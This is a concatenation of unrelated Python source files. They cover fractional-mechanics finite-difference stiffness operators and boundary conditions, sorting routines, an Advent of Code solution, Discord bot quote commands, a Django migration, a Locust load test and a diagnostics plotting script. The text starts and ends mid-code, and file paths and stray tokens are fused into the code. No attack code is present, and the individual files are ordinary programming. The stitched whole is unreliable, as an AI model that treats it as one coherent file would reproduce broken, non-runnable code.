_create_stiffness_stencils(self, mesh): data = FractionalStiffnessInput( mesh, self._length, self._span, self._context['stiffness_operator_strategy'], self._get_corrected_young_modulus, self._context['alpha'], self._context['resolution'], self._context['length_scale_controller'], self.moment_of_inertia_controller, self._context['integration_method'], self._context['fractional_operator_pattern'] ) return self._stiffness_factory[self._analysis_strategy](data) def _create_complex_bcs(self, mesh): data = FractionalBCsInput( mesh, self._length, self._span, self._context['virtual_boundary_strategy'], self._context['alpha'], self._context['resolution'], self._context['length_scale_controller'], self.moment_of_inertia_controller, self._context['integration_method'], self._get_corrected_young_modulus, ) return self._complex_boundary_factory( self._context['analysis_type'], self._context['boundary'], data) @property def length_scale(self): return self._revolve_for_points(self.length_scale_controller.get) def create_truss_stiffness_operators_up_to_down(data): span = data.span resolution = data.resolution alpha = data.alpha length = data.length settings_builder = dynamic_settings_builder(span, alpha, data.length_scale_controller, resolution) create_strain_operator_builder = create_fractional_strain_operator_builder( span, data.integration_method, settings_builder) fractional_deformation_operator_central = fdm.DynamicElement( create_strain_operator_builder( data.fractional_operator_pattern['central'] ) ) fractional_deformation_operator_backward = fdm.DynamicElement( create_strain_operator_builder( data.fractional_operator_pattern['backward'] ) ) fractional_deformation_operator_forward = fdm.DynamicElement( create_strain_operator_builder( data.fractional_operator_pattern['forward'] ) ) E = data.young_modulus_controller fractional_ep_central = fdm.Operator( fdm.Stencil.central(span=span), fdm.Number(E) * fractional_deformation_operator_central ) fractional_ep_backward = fdm.Operator( fdm.Stencil.backward(span=span), fdm.Number(E) * fractional_deformation_operator_backward ) fractional_ep_forward = fdm.Operator( fdm.Stencil.forward(span=span), fdm.Number(E) * fractional_deformation_operator_forward ) fractional_ep_forward_central = fdm.Operator( fdm.Stencil.forward(span=span), fdm.Number(E) * fractional_deformation_operator_central ) fractional_ep_backward_central = fdm.Operator( fdm.Stencil.backward(span=span), fdm.Number(E) * fractional_deformation_operator_central ) operators = { 'central': fractional_ep_central, 'forward': fractional_ep_forward, 'backward': fractional_ep_backward, 'forward_central': fractional_ep_forward_central, 'backward_central': fractional_ep_backward_central, } def dispatch(point): return { Point(0. 
+ span): operators['forward_central'], Point(length - span): operators['backward_central'], }.get(point, operators['central']) if data.strategy == 'minimize_virtual_layer': return fdm.DynamicElement(dispatch) else: # standard return operators['central'] def create_truss_stiffness_operators_down_to_up(data): return [] def create_beam_stiffness_operators_up_to_down(data): span = data.span resolution = data.resolution alpha = data.alpha length = data.length settings_builder = dynamic_settings_builder(span, alpha, data.length_scale_controller, resolution) E = data.young_modulus_controller I = data.moment_of_inertia_controller central_base_stencils = { 'A': fdm.Stencil.central(span), 'B': fdm.Stencil.central(span), 'C': fdm.Stencil.central(span), 'D': fdm.Stencil.central(span), } backward_base_stencils = { 'A': fdm.Stencil.backward(span), 'B': fdm.Stencil.backward(span), 'C': fdm.Stencil.backward(span), 'D': fdm.Stencil.backward(span), } forward_base_stencils = { 'A': fdm.Stencil.forward(span), 'B': fdm.Stencil.forward(span), 'C': fdm.Stencil.forward(span), 'D': fdm.Stencil.forward(span), } central_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, central_base_stencils, settings_builder) backward_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, backward_base_stencils, settings_builder) forward_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, forward_base_stencils, settings_builder) central_operators = fractional_mechanics.create_beam_stiffness_operators_factory( central_stencils, settings_builder) backward_operators = fractional_mechanics.create_beam_stiffness_operators_factory( backward_stencils, settings_builder) forward_operators = fractional_mechanics.create_beam_stiffness_operators_factory( forward_stencils, settings_builder) def create_operator(operators): return fdm.Number(E) * fdm.Number(I) * operators['D'] operators = { 'central': create_operator(central_operators), 'forward': create_operator(forward_operators), 'backward': create_operator(backward_operators), } def dispatch(point): return { Point(0. 
+ span): operators['forward'], Point(length - span): operators['backward'], }.get(point, operators['central']) if data.strategy == 'minimize_virtual_layer': return fdm.DynamicElement(dispatch) else: # standard return operators['central'] def create_beam_stiffness_operators_down_to_up(data): span = data.span resolution = data.resolution alpha = data.alpha mesh = data.mesh settings_builder = dynamic_settings_builder(span, alpha, data.length_scale_controller, resolution) E = data.young_modulus_controller I = data.moment_of_inertia_controller EI = fdm.Number(E) * fdm.Number(I) central_base_stencils = { 'A': fdm.Stencil.central(span), 'B': fdm.Stencil.central(span), 'C': fdm.Stencil.central(span), 'D': fdm.Stencil.central(span), } wide_central_base_stencils = { 'A': fdm.Stencil.central(2.*span), 'B': fdm.Stencil.central(2.*span), 'C': fdm.Stencil.central(2.*span), 'D': fdm.Stencil.central(2.*span), } backward_base_stencils = { 'A': fdm.Stencil.backward(span), 'B': fdm.Stencil.backward(span), 'C': fdm.Stencil.backward(span), 'D': fdm.Stencil.backward(span), } forward_base_stencils = { 'A': fdm.Stencil.forward(span), 'B': fdm.Stencil.forward(span), 'C': fdm.Stencil.forward(span), 'D': fdm.Stencil.forward(span), } central_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, central_base_stencils, settings_builder) wide_central_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, wide_central_base_stencils, settings_builder) backward_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, backward_base_stencils, settings_builder) forward_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, forward_base_stencils, settings_builder) def get_stencils(key): return [central_stencils[key], wide_central_stencils[key], backward_stencils[key], forward_stencils[key]] def null_factory(point): return fdm.Stencil.null() def build_dispatcher(rules, operator_name): def dispatch(point): central, wide_central, backward, forward = get_stencils(operator_name) if point in rules.null: factory = null_factory elif point in rules.forward: factory = forward elif point in rules.backward: factory = backward elif point in rules.wide_central: factory = wide_central else: factory = central return factory(point) return dispatch class Rules: def __init__(self, null=(), backward=(), forward=(), wide_central=()): self.null = null self.backward = backward self.forward = forward self.wide_central = wide_central def p(idx): return Point(idx*span) virtual_nodes = mesh.virtual_nodes vn = len(virtual_nodes) hvn = int(vn/2.) n = len(mesh.real_nodes) - 1 hn = int(n/2.) 
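# Note: the mesh stores the fictitious "virtual" nodes added outside the physical domain alongside the real ones; the first half of `virtual_nodes` appears to belong to the left boundary and the second half to the right one, which is why the list is split at `hvn` below.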
left_virtual_nodes = virtual_nodes[:hvn] right_virtual_nodes = virtual_nodes[hvn:] real_nodes = mesh.real_nodes a_range = hn a_rules = Rules( null=left_virtual_nodes[-2:] + right_virtual_nodes[-2:], forward=left_virtual_nodes[:a_range] + real_nodes[:a_range], backward=right_virtual_nodes[:a_range] + real_nodes[-a_range:], ) b_range = hn b_rules = Rules( null=left_virtual_nodes[-2:] + right_virtual_nodes[-2:], # forward=left_virtual_nodes[:b_range] + real_nodes[:b_range], # backward=right_virtual_nodes[:b_range] + real_nodes[-b_range:], ) c_range = hn c_rules = Rules( null=left_virtual_nodes[-2:] + right_virtual_nodes[-2:], forward=left_virtual_nodes[:c_range] + real_nodes[:c_range], backward=right_virtual_nodes[:c_range] + real_nodes[-c_range:], ) scheme_null = left_virtual_nodes + right_virtual_nodes d_range = hn d_rules = Rules( null=scheme_null, # forward=real_nodes[1:d_range], # backward=real_nodes[-d_range:-1], ) if data.strategy == 'minimize_virtual_layer': return [ EI*fdm.DynamicElement(build_dispatcher(a_rules, 'A')), fdm.DynamicElement(build_dispatcher(b_rules, 'B')), fdm.DynamicElement(build_dispatcher(c_rules, 'C')), fdm.DynamicElement(build_dispatcher(d_rules, 'D')), ] else: # standard raise NotImplementedError def create_fractional_strain_operator_builder(span, integration_method, settings_builder): def build(pattern): def create_stencil(point): return fractional_mechanics.create_riesz_caputo_strain_operator_by_pattern( integration_method, settings_builder(point), pattern, span ).to_stencil(Point(0)) def create_id(point): return settings_builder(point) return create_cached_factory(create_stencil, create_id) return build def create_riesz_caputo_stencil_builder(integration_method, settings_builder, multiplier=None): def create(point): settings = settings_builder(point) stencil = fractulus.create_riesz_caputo_stencil(integration_method, settings) m = multiplier(point) if multiplier else 1. return (fdm.Number(m) * stencil).to_stencil(point) def create_id(point): return settings_builder(point) return create_cached_factory(create, create_id) def dynamic_settings_builder(span, alpha, length_scale_controller, resolution): dynamic_lf = length_scale_controller def dynamic_resolution(point): return int(dynamic_lf(point) / span) if resolution is None else resolution def get(point): return fractulus.Settings(alpha, dynamic_lf(point), dynamic_resolution(point)) return get def create_complex_beam_bcs(): strategy = Strategy() strategy.register(fdm.AnalysisType.SYSTEM_OF_LINEAR_EQUATIONS, create_beam_statics_bcs) strategy.register(fdm.AnalysisType.EIGENPROBLEM, create_beam_eigenproblem_bc) return strategy def create_beam_statics_bcs(boundary, data): span = data.span alpha = data.alpha resolution = data.resolution mesh = data.mesh begin_node, end_node = mesh.real_nodes[0], mesh.real_nodes[-1] begin_displacement_fixed = static_boundary(fdm.Scheme({begin_node: 1.}), 0.) end_displacement_fixed = static_boundary(fdm.Scheme({end_node: 1.}), 0.) settings_builder = dynamic_settings_builder(span, alpha, data.length_scale_controller, resolution) E = data.young_modulus_controller def moment_of_inertia_controller(point): return 1. 
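# Note: the local `moment_of_inertia_controller` above always returns 1.0, so the boundary stencils assembled below are effectively scaled by the Young's modulus alone; `data.moment_of_inertia_controller` does not appear to be consulted in this statics BC factory.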
I = moment_of_inertia_controller EI = fdm.Number(E) * fdm.Number(I) central_base_stencils = { 'A': EI*fdm.Stencil.central(span), 'B': fdm.Stencil.central(span), 'C': fdm.Stencil.central(span), 'D': fdm.Stencil.central(span), } central_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, central_base_stencils, settings_builder) operators = fractional_mechanics.create_beam_stiffness_operators_factory(central_stencils, settings_builder) begin_A_scheme = operators['A'].expand(begin_node) end_A_scheme = operators['A'].expand(end_node) begin_B_scheme = operators['B'].expand(begin_node) end_B_scheme = operators['B'].expand(end_node) begin_rotation_zero = static_boundary(begin_A_scheme, 0.) end_rotation_zero = static_boundary(end_A_scheme, 0.) begin_moment_zero = static_boundary(begin_B_scheme, 0.) end_moment_zero = static_boundary(end_B_scheme, 0.) bcs = [] left_type = boundary[Side.LEFT].type right_type = boundary[Side.RIGHT].type if left_type == BoundaryType.FIXED: bcs += [ begin_displacement_fixed, begin_rotation_zero, ] elif left_type == BoundaryType.HINGE: bcs += [ begin_displacement_fixed, begin_moment_zero, ] if right_type == BoundaryType.FIXED: bcs += [ end_displacement_fixed, end_rotation_zero, ] elif right_type == BoundaryType.HINGE: bcs += [ end_displacement_fixed, end_moment_zero, ] def p(s, base=0.): return Point(base + span * s) left_vbc_stencil = fdm.Stencil({p(-2): -1., p(-1): 4., p(0): -5., p(2): 5., p(3): -4., p(4): 1.}) right_vbc_stencil = fdm.Stencil({p(2): -1., p(1): 4., p(0): -5., p(-2): 5., p(-3): -4., p(-4): 1.}) virtual_nodes = mesh.virtual_nodes vn = len(virtual_nodes) hvn = int(vn / 2.) left_virtual_nodes = virtual_nodes[:hvn] right_virtual_nodes = virtual_nodes[hvn:] bcs += [static_boundary(left_vbc_stencil.expand(node), 0.) for node in left_virtual_nodes[:-2]] bcs += [static_boundary(right_vbc_stencil.expand(node), 0.) for node in right_virtual_nodes[:-2]] return bcs def create_beam_eigenproblem_bc(length, span, mesh, boundary): # todo: pass return {} def create_complex_truss_bcs(): strategy = Strategy() strategy.register(fdm.AnalysisType.SYSTEM_OF_LINEAR_EQUATIONS, create_truss_statics_bcs) strategy.register(fdm.AnalysisType.EIGENPROBLEM, create_truss_eigenproblem_bc) return strategy def create_truss_statics_bcs(boundary, data): mesh = data.mesh span = data.span begin_node, end_node = mesh.real_nodes[0], mesh.real_nodes[-1] begin_displacement_fixed = static_boundary(fdm.Scheme({begin_node: 1.}), 0.) end_displacement_fixed = static_boundary(fdm.Scheme({end_node: 1.}), 0.) bcs = [] if boundary[Side.LEFT].type == BoundaryType.FIXED: bcs += [ begin_displacement_fixed, ] if boundary[Side.RIGHT].type == BoundaryType.FIXED: bcs += [ end_displacement_fixed, ] def p(s, base=0.): return Point(base + span * s) virtual_nodes = mesh.virtual_nodes vn = len(virtual_nodes) hvn = int(vn / 2.) left_virtual_nodes = virtual_nodes[:hvn] right_virtual_nodes = virtual_nodes[hvn:] if data.virtual_nodes_strategy == VirtualBoundaryStrategy.SYMMETRY: symmetry_stencil = fdm.Stencil({p(-1): -1., p(1): 1.}) bcs += [ static_boundary(symmetry_stencil.expand(left_virtual_nodes[0]), 0.), static_boundary(symmetry_stencil.expand(right_virtual_nodes[0]), 0.) 
] elif data.virtual_nodes_strategy == FractionalVirtualBoundaryStrategy.BASED_ON_SECOND_DERIVATIVE: left_vbc_stencil = fdm.Stencil({p(0): -1., p(1): 3., p(2): -3., p(3): 1.}) right_vbc_stencil = fdm.Stencil({p(-3): 1., p(-2): -3., p(-1): 3., p(0): -1.}) bcs += [ static_boundary(left_vbc_stencil.expand(left_virtual_nodes[0]), 0.), static_boundary(right_vbc_stencil.expand(right_virtual_nodes[0]), 0.) ] else: raise NotImplementedError return bcs def create_truss_eigenproblem_bc(boundary, data): mesh = data.mesh begin_node, end_node = mesh.real_nodes[0], mesh.real_nodes[-1] begin_displacement_fixed = dynamic_boundary(fdm.Scheme({begin_node: 1.}), fdm.Scheme({}), replace=begin_node) end_displacement_fixed = dynamic_boundary(fdm.Scheme({end_node: 1.}), fdm.Scheme({}), replace=end_node) bcs = [] if boundary[Side.LEFT].type == BoundaryType.FIXED: bcs += [ begin_displacement_fixed, ] if boundary[Side.RIGHT].type == BoundaryType.FIXED: bcs += [ end_displacement_fixed, ] return bcs def create_vanish_length_scale_corrector(length, init_value, min_value): def correct(point): return max(min_value, min(init_value, point.x, length - point.x)) return correct def create_step_vanish_length_scale_corrector(length, init_value, min_value, span): interval_number = round(length / span) span_init_value = round(init_value / span) span_min_value = round(min_value / span) def correct(point): node_address = point.x / span span_value = max( span_min_value, min( span_init_value, int(node_address) + 1, (interval_number + 1) - round(node_address) ) ) return span_value * span return correct LENGTH_SCALES_CONTROLLERS = { 'vanish': create_vanish_length_scale_corrector, 'step_vanish': create_step_vanish_length_scale_corrector, } 0 #! /usr/bin/env python # -*- coding: utf-8 -*- """ @version: 0.1 @author: quantpy @email: @file: __init__.py.py @time: 2017-08-08 15:15 """ from __future__ import division, print_function, unicode_literals class Main(object): def __init__(self): pass def main(): pass if __name__ == '__main__': try: main() except Exception as err: print(repr(err)) ################################################################################ # SPDX-FileCopyrightText: Copyright (c) 2019-2021 NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
################################################################################ import time start_time=time.time() frame_count=0 class GETFPS: def __init__(self,stream_id): global start_time self.start_time=start_time self.is_first=True global frame_count self.frame_count=frame_count self.stream_id=stream_id def get_fps(self): end_time=time.time() if(self.is_first): self.start_time=end_time self.is_first=False if(end_time-self.start_time>5): print("**********************FPS*****************************************") print("Fps of stream",self.stream_id,"is ", float(self.frame_count)/5.0) self.frame_count=0 self.start_time=end_time else: self.frame_count=self.frame_count+1 def print_data(self): print('frame_count=',self.frame_count) print('start_time=',self.start_time) def selection_sort(array): current_index = 0 while current_index < len(array) - 1: smallest_index = current_index for i in range(current_index + 1, len(array)): if array[smallest_index] > array[i]: smallest_index =i array[current_index], array[smallest_index] = array[smallest_index], array[current_index] current_index +=1 return array 2019/day1.py import math day_num = 1 file_load = open("input/day1.txt", "r") file_in = file_load.read() file_load.close() file_in = list(map(int, file_in.split("\n"))) def run(): def fuel(input_mass): return math.floor(input_mass / 3) - 2 def launch(input_in): fuel_total = 0 for temp_mass in input_in: fuel_total += fuel(temp_mass) return fuel_total def stonk(input_in): fuel_total = 0 for temp_mass in input_in: while temp_mass >= 0: fuel_calc = fuel(temp_mass) if fuel_calc > 0: fuel_total += fuel_calc temp_mass = fuel_calc else: temp_mass = -1 return fuel_total return launch(file_in), stonk(file_in) if __name__ == "__main__": print(run())0 class image(object): """description of class""" """ Represents an ECS Image """ from footmark.ecs.ecsobject import TaggedECSObject class Image(TaggedECSObject): def __init__(self, connection=None): super(Image, self).__init__(connection) self.tags = {} def __repr__(self): return 'Image:%s' % self.id def __getattr__(self, name): if name == 'id': return self.image_id if name == 'name': return self.image_name raise AttributeError def __setattr__(self, name, value): if name == 'id': self.image_id = value if name == 'name': self.image_name = value if name == 'tags' and value: v = {} for tag in value['tag']: v[tag.get('TagKey')] = tag.get('TagValue', None) value = v super(TaggedECSObject, self).__setattr__(name, value) def delete(self): """ Terminate the image """ return self.connection.delete_image(self.id) spec/rift/data/models/schedule.py import uuid from specter import Spec, DataSpec, expect, skip from rift.data.models.schedule import Schedule, Entry from spec.rift.api.resources.fixtures import MockedDatabase example_schedule_dict = { 'id': '1234', 'name': 'my schedule', 'entries': [ { "job_id": "job1", "delay": "01:02:03", } ] } class ScheduleModel(Spec): class Deserialization(Spec): def can_deserialize_from_a_dictionary(self): tenant_id = str(uuid.uuid4()) schedule = Schedule.build_schedule_from_dict( tenant_id, example_schedule_dict) expect(schedule.tenant_id).to.equal(tenant_id) expect(schedule.schedule_id).to.equal('1234') expect(schedule.name).to.equal('my schedule') expect(schedule.entries[0].job_id).to.equal('job1') expect(schedule.entries[0].delay).to.equal("01:02:03") class Serialization(Spec): def can_serialize_to_a_dictionary(self): entry = Entry(job_id='job1', delay="01:02:03") schedule = Schedule(tenant_id='tenant1', schedule_id='schedule1', 
entries=[entry], name='my schedule') schedule_dict = schedule.as_dict() expect(schedule_dict.get('id')).to.equal('schedule1') expect(schedule_dict.get('name')).to.equal('my schedule') expect(len(schedule_dict.get('entries', []))).to.equal(1) e = schedule_dict['entries'][0] expect(e.get('job_id')).to.equal('job1') expect(e.get('delay')).to.equal("01:02:03") class DatabaseActions(MockedDatabase): def before_each(self): super(type(self), self).before_each() self.tenant_id = str(uuid.uuid4()) self.schedule = Schedule.build_schedule_from_dict( self.tenant_id, example_schedule_dict) Schedule.save_schedule(self.schedule) def can_save_and_get_a_schedule(self): found = Schedule.get_schedule( self.tenant_id, self.schedule.schedule_id) expect(found.as_dict()).to.equal(example_schedule_dict) def should_fail_to_get_missing_schedule(self): found = Schedule.get_schedule(self.tenant_id, str(uuid.uuid4())) expect(found).to.be_none() def can_get_schedules(self): schedules = Schedule.get_schedules(self.tenant_id) expect(len(schedules)).to.equal(1) expect(schedules[0].as_dict()).to.equal(example_schedule_dict) @skip('Fails - "not enough arguments for format string" in mongomock') def can_delete(self): Schedule.delete_schedule(self.schedule.schedule_id) found = Schedule.get_schedule( self.tenant_id, self.schedule.schedule_id) expect(found).to.be_none() class Entry(DataSpec): DATASET = { 'zero_delay': { "delay": "00:00:00", "result": 0, }, 'delay_with_nonzero_seconds': { "delay": "00:00:93", "result": 93, }, 'delay_with_nonzero_minutes': { "delay": "00:84:00", "result": 5040, }, 'delay_with_nonzero_hours': { "delay": "67:00:00", "result": 241200, }, 'delay_with_hours_minutes_and_seconds': { "delay": "12:34:56", "result": 45296, }, } def can_get_total_seconds_for(self, delay, result): entry = Entry(job_id=str(uuid.uuid4()), delay=delay) expect(entry.get_total_seconds()).to.equal(result) from pathlib import Path from random import randint import discord from redbot.core import checks, commands from redbot.core.bot import Red from redbot.core.i18n import cog_i18n from redbot.core.utils.chat_formatting import error, warning from cog_shared.swift_libs import ( Page, PaginatedMenu, chunks, confirm, fmt, tick, to_lazy_translator, trim_to, ) from quotes.editor import QuoteEditor from quotes.quote import Quote, conf, ensure_can_modify, i18n from quotes.v2_import import import_v2_data lazyi18n = to_lazy_translator(i18n) @cog_i18n(i18n) class Quotes: """Save and retrieve quotes""" __author__ = "odinair <>" DELETE_WARNING = lazyi18n( "Are you sure you want to delete this quote?\n\n" "Unless you have a time machine, this action **cannot be undone**." ) def __init__(self, bot: Red): self.bot = bot self.config = conf Quote.bot = self.bot @commands.group(name="quote", aliases=["quotes"], invoke_without_command=True) @commands.guild_only() async def quote(self, ctx: commands.Context, quote: Quote = None): """Save and retrieve quotes If no quote is given, a random quote is retrieved instead. """ if quote is None: quotes = len(await self.config.guild(ctx.guild).quotes()) if not quotes: await ctx.send_help() return quote = await Quote.get(ctx.guild, randint(1, quotes)) await ctx.send(embed=quote.embed) @quote.command(hidden=True, name="lorem") @checks.is_owner() async def quote_lorem_ipsum(self, ctx: commands.Context, amount: int = 100): """Generates some junk lorem ipsum quotes. This is basically only useful if you're working on Quotes itself, and need some data to test with. 
**Requires the `loremipsum` module (`[p]pipinstall loremipsum`).** """ try: import loremipsum except ImportError: await ctx.send( error( i18n( "Failed to import the `loremipsum` module; please do `{prefix}pipinstall " "loremipsum` and use this command again." ).format(prefix=ctx.prefix) ) ) return import re for _ in range(amount): await Quote.create( " ".join( [ " ".join( [re.sub(r"[Bb]\'(.*)\'", lambda x: x.group(1), x) for x in y.split()] ).capitalize() for y in loremipsum.get_sentences(3) ] ), ctx.author, ) await ctx.send("Generated {} quotes.".format(amount)) @quote.command(hidden=True, name="clearall") @checks.guildowner() async def quote_clearall(self, ctx: commands.Context): if not await confirm( ctx, content=i18n( "Are you sure you want to reset all quotes?\n\nUnless you have a time machine, " "**this action is irreversible.**" ), ): await ctx.send(i18n("Operation cancelled.")) return await self.config.guild(ctx.guild).quotes.set([]) await ctx.tick() @quote.command(hidden=True, name="v2_import") @checks.is_owner() async def quote_v2_import(self, ctx: commands.Context, path: str): """Import quotes data from a Red v2 instance""" path = Path(path) / "data" / "quotes" / "quotes.json" if not path.is_file(): await ctx.send(error(i18n("That file path doesn't seem to be valid"))) return async with ctx.typing(): await import_v2_data(config=self.config, path=path) await ctx.send(tick(i18n("Imported data successfully."))) @quote.command(name="add") async def quote_add(self, ctx: commands.Context, *, message: str): """Add a quote""" quote = await Quote.create(message, ctx.author, ctx.author) await ctx.send(tick(i18n("Quote added")), embed=quote.embed) @quote.command(name="message") async def quote_message(self, ctx: commands.Context, message: int): """Quote a message by it's ID The message specified must be in the same channel this command is executed in You can obtain a message's ID by enabling Developer Mode in your Appearance settings, and clicking Copy ID in the message's context menu """ try: message = await ctx.get_message(message) except discord.NotFound: await ctx.send( warning(i18n("I couldn't find that message. (is it in a different channel?)")) ) except discord.Forbidden: await ctx.send(warning(i18n("I'm not allowed to retrieve that message"))) else: quote = await Quote.create(message.content, ctx.author, message.author) await ctx.send(tick(i18n("Quote added")), embed=quote.embed) @quote.group(name="edit", aliases=["modify"], invoke_without_command=True) async def quote_edit(self, ctx: commands.Context, quote: Quote): """Interactive quote editor This requires you to be the quote creator, the attributed author or a guild moderator or administrator. """ await ensure_can_modify(ctx.author, quote) await QuoteEditor(ctx, quote)() @quote_edit.command(name="author") async def edit_author(self, ctx: commands.Context, quote: Quote, *, author: discord.Member): """Attribute a quote to the specified user This requires you to be the quote creator, an administrator or moderator """ await ensure_can_modify(ctx.author, quote) quote.edited = True quote.message_author = author await quote.save() await ctx.send( tick(i18n("Attributed quote #{} to **{}**.").format(int(quote), str(author))) ) @quote.command(name="list") async def quote_list(self, ctx: commands.Context, per_page: int = 8): """List the quotes in the current guild Maximum amount of quotes per page is 15; any higher values are silently reduced to this limit. 
""" quotes = await Quote.all_quotes(ctx.guild) if not quotes: return await fmt( ctx, warning(i18n("This guild has no quotes! Use `{prefix}quote add` to add some!")) ) per_page = min(per_page, 15) def convert(page: Page): embed = discord.Embed( colour=ctx.me.colour, title=i18n("Guild Quotes"), description=i18n("Displaying {} out of {} quotes").format( len(page.data), len(quotes) ), ) embed.set_footer(text=i18n("Page {0.current} out of {0.total}").format(page)) for q in page.data: embed.add_field( name=i18n("Quote #{}").format(q.id), value=trim_to(q.text, min(5000 // per_page, 1024)), inline=False, ) return embed await PaginatedMenu( ctx=ctx, pages=list(chunks(quotes, per_page)), converter=convert, actions={}, wrap_around=True, ) @quote.command(name="remove", aliases=["rm", "delete"]) async def quote_remove(self, ctx: commands.Context, quote: Quote): """Remove a quote by it's ID This requires you to either be the quote's creator, an administrator, moderator, or the attributed message author. """ await ensure_can_modify(ctx.author, quote) if await confirm(ctx, content=warning(self.DELETE_WARNING)): await quote.delete() await ctx.send(tick(i18n("Quote successfully deleted."))) else: await ctx.send(i18n("Ok then.")) src/apps/profiles/migrations/0001_initial.py0 # Generated by Django 2.1 on 2018-08-10 04:31 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import uuid class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Profile', fields=[ ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), ('state', models.PositiveSmallIntegerField(choices=[(29, 'Tlaxcala')], default=29)), ('site', models.PositiveSmallIntegerField(choices=[(0, 'Junta Local'), (1, '01 Junta Distrital'), (2, '02 Junta Distrital'), (3, 'O3 Junta Distrital')], default=0)), ('position', models.CharField(choices=[('VEL', 'Vocal Ejecutivo de Junta Local'), ('VSL', 'Vocal Secretario de Junta Local'), ('VRL', 'Vocal del RFE de Junta Local'), ('VCL', 'Vocal de Capacitación de Junta Local'), ('VOL', 'Vocal de Organización de Junta Local'), ('VED', 'Vocal Ejecutivo de Junta Distrital'), ('VSD', 'Vocal Secretario de Junta Distrital'), ('VRD', 'Vocal del RFE de Junta Distrital'), ('VCD', 'Vocal de Capacitación de Junta Distrital'), ('VOD', 'Vocal de Organización de Junta Distrital'), ('JOSA', 'JOSA'), ('JOSAD', 'JOSAD'), ('JMM', 'Jefe de Monitoreo a Módulos'), ('JOCE', 'Jefe de Cartografía'), ('RA', 'Rama Administrativa')], default='RA', max_length=5)), ('order', models.PositiveSmallIntegerField(blank=True, default=99, null=True)), ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ] #Задание 3. Вариант 32 #Напишите программу, которая выводит имя "", и запрашивает его псевдоним. Программа должна сцеплять две эти строки и выводить полученную строку, разделяя имя и псевдоним с помощью тире. # #10.03.2016 print("Герой нашей сегоднешней программы - ") print("Под каким же именем мы знаем этого человека? Ваш ответ: Фред Астер") print("Все верно: - Фред Астер") input("Нажмите Enter для выхода из программы") """ Unit tests for XYZ package. ------------------------------------------------------------------------------ COPYRIGHT/LICENSE. This file is part of the XYZ package. 
It is subject to the license terms in the LICENSE file found in the top-level directory of this distribution. No part of the XYZ package, including this file, may be copied, modified, propagated, or distributed except according to the terms contained in the LICENSE file. ------------------------------------------------------------------------------ """ # -*- coding: utf-8 -*- # @Time : 19-5-20 10:39 AM # @Author : Redtree # @File : radix_sort.py # @Desc : radix sort #---- radix sort ---- #determine how many sorting passes are needed #the number of passes equals the number of digits of the largest value in the sequence def radix_sort_nums(L): maxNum = L[0] #find the largest number in the sequence for x in L: if maxNum < x: maxNum = x #count the digits of the largest element times = 0 while (maxNum > 0): maxNum = (int)(maxNum/10) times = times+1 return times #get the pos-th digit of num, counting from the lowest digit def get_num_pos(num,pos): return ((int)(num/(10**(pos-1))))%10 #radix sort def dosort(L): count = 10*[None] #holds the element count of each bucket bucket = len(L)*[None] #temporarily holds the sorted result #loop from the lowest digit to the highest for pos in range(1,radix_sort_nums(L)+1): #reset the bucket counts for x in range(0,10): count[x] = 0 #count elements by the current digit (ones, tens, hundreds, ...) for x in range(0,len(L)): #count how many elements will go into each bucket j = get_num_pos(int(L[x]),pos) count[j] = count[j]+1 #count[i] is the right boundary index of bucket i for x in range(1,10): count[x] = count[x] + count[x-1] #place the elements into the buckets for x in range(len(L)-1,-1,-1): #get the digit of the element at the current position j = get_num_pos(L[x],pos) #put it into the matching bucket; count[j]-1 is the right boundary index of bucket j bucket[count[j]-1] = L[x] #decrement that bucket's insertion index count[j] = count[j]-1 # pour the bucketed data back into L; the list is now ordered by the current digit for x in range(0,len(L)): L[x] = bucket[x] return L from locust import HttpUser, between, task class WebsiteUser(HttpUser): wait_time = between(5, 15) # def on_start(self): # self.client.post("/login", { # "username": "test_user", # "password": "" # }) @task def index(self): self.client.get("/") # self.client.get("/static/assets.js") # @task # def about(self): # self.client.get("/about/") import sys import struct import json import random import tarfile import os import argparse import pint import math import csv U = pint.UnitRegistry() import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt plt.rcParams['image.interpolation'] = 'nearest' import seaborn as sns import numpy as np import pandas as pd from collections import defaultdict from concurrent.futures import ThreadPoolExecutor from matplotlib.colors import LogNorm from PIL import Image from typing import List from multiprocessing import Pool from functools import partial sns.set_style("ticks", {'axes.grid': True}) TREELET_TYPE = 0 def read_intervals(f, num_workers): worker_intervals = {} for line in f: tokens = line.split(' ') worker_id = int(tokens[1]) num_actions = int(tokens[2]) offset = 3 intervals = [] for _ in range(num_actions): action_name = tokens[offset] num_intervals = int(tokens[offset + 1]) offset += 2 for n in range(num_intervals): start, end = tokens[offset + n].split(',') intervals.append((action_name, int(start), int(end))) offset += num_intervals worker_intervals[worker_id] = intervals if len(worker_intervals) == num_workers: break return worker_intervals class WorkerDiagnostics(object): def __init__(self, idx, file_path : str): self.idx = idx self.path = file_path self.metrics = defaultdict(list) time_per_action = defaultdict(dict) bytes_sent_per_worker = defaultdict(dict) self.timestamps = [] self.top_level_actions = set() with open(file_path, 'r') as f: _, start_timestamp = f.readline().strip().split(' ') self.start_timestamp = int(start_timestamp) for line in f: timestamp, json_data = line.strip().split(' ') timestamp = int(timestamp) self.timestamps.append(timestamp) data = json.loads(json_data) if 'timePerAction' in data: for tup in 
